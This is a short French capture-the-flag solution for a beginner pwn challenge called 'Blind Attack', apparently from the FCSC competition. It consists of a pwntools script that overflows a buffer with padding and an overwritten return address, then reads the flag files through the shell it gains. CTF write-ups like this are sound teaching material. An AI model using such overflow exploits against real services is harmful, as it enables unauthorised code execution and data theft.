Solution de patatetom pour Blind Attack

intro pwn attaque-défense x86/x64

8 janvier 2025

#!/usr/bin/env python3
import json
import os
from pwn import *

context.log_level = "DEBUG"  # or INFO, WARNING, ERROR

r = remote("localhost", 4000, typ="tcp", timeout=2)

data = r.recvuntil(b'e note summary.\n')
r.sendline(b'n')
data = r.recvuntil(b'yBbyF\nContent: \n')
r.sendline(b'K4P1xKvcRJsXrOLltXjov5ckv88NBlXqCvklIHVh5VySHUUHjAv4g5Gldm4gkGYiQcpeUeW5zDfFSI2LHs2zPn3EkZb4DBrTAmlJu2i0TseDvhHgzb4rG7aAKJB1cUAOQcffsfKrpfB0aDY6AS0l1yPJWD6OCkbEvO07ZbNhIMawN1srqF7AIuf1fScqPl4TwTeIZbldkivMb2DNoagmY8dS8MT5ux2WI0U5XYya\xe5\x16@\x00\x00\x00\x00\x00')
r.sendline(b'cat /fcsc/ddJ565eGcAPFVkHZZFqXtrYe2vmVUQv/*')
data = r.recvall(timeout=2)

r.close()